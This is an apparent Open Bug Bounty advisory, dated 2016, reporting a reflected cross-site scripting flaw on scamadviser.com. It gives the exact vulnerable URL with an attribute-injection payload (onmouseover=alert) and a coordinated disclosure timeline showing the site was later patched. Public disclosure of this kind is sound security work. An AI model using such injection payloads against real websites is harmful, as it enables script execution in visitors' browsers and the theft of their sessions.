scamadviser.com XSS vulnerability

2016-03-10T02:28:00
ID OBB:140496
Type openbugbounty
Reporter ahmetomeroglu
Modified 2016-08-25T17:23:00

Description

Vulnerable URL:
http://www.scamadviser.com/check-website/%22%20onmouseover=alert%28/XSSPOSED/%29%20%22?abc=&domain;=#
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4461
Google Pagerank| 3
VIP website status:| Yes
Check scamadviser.com SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 10 March, 2016 02:28 GMT
Generic security notifications sent to website owner| 10 March, 2016 02:30 GMT
Notification sent to subscribers (without technical details)| 10 March, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 25 August, 2016 03:12 GMT
Vulnerability patched by the website owner| 25 August, 2016 17:23 GMT